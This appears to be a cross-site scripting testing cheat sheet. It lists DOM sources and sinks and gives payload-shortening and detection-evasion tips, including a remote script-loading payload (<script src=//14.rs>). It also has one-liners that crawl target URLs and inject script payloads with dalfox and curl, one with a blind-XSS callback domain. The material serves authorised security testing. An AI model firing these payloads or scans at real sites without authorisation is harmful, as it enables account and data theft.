- Credits
- Somedev Sangwan for the awesome tips and tricks.
- domxsswiki for the awesome list of sinks and sources.
- Table of contents
- Sources
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
- Sinks
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
-
Q: How to identify sinks and sources?
-
A: Use the browser extension Untrusted Types by filedescriptor.
-
Tips and Tricks @s0md3v
- http(s):// can be shortened to // or /\ or \.
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
- You can use // to close a tag instead of >.
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
- The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)
- Scanning XSS from host / from @cihanmehmet
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
- Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy
cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
- XSS without Gf / from @HacktifyS
waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
- XSS test beds and challenges
- Amazing tools
- XSS weaponized payloads